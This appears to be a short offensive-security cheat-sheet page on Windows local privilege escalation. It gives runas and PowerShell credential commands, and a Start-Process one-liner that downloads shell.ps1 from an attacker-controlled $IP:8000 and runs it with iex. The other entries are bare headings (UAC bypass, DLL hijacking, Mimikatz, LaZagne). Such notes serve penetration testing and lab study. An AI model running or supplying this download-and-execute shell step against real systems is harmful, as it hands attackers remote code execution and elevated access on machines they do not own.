Local Privilege Escalation
Escalate privileges on a local computer to become a more powerful user
Credentials
runas /user:j0r1an powershell # local
runas /user:corp\j0r1an powershell # domain$pass = ConvertTo-SecureString '$PASSWORD' -AsPlainText -Force
# 1. Local account
$c = New-Object System.Management.Automation.PSCredential("$USERNAME", $pass)
# 2. Domain account
$c = New-Object System.Management.Automation.PSCredential("$DOMAIN\$USERNAME", $pass)
Start-Process -Credential ($c) -NoNewWindow powershell "iex (New-Object Net.WebClient).DownloadString('http://$IP:8000/shell.ps1')" # Run your payload herePrivileges
SeImpersonatePrivilege
Other Se...Privilege
'Disabled' privileges
UAC Bypass

DLL Hijacking

Post-Exploitation: Mimikatz
Remote alternatives
LaZagne
Last updated

